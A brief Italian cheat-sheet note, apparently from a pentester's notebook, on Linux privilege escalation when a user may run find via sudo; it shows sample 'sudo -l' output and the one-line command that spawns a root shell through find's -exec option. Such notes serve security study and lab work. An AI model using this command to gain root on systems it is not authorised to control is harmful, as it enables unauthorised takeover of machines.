tags: Find_SUDO Permessi_SUDO privilage_escalation Linux_Privilage_Escalation


Se possiedi questi permessi:

 sudo -l
[sudo] password for john: 
Matching Defaults entries for john on base:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User john may run the following commands on base:
    (root : root) /usr/bin/find

Cioè permessi sudo per il programma find puoi ottenere una shell di root semplicemente digitando questo comando:

sudo find . -exec /bin/sh \; -quit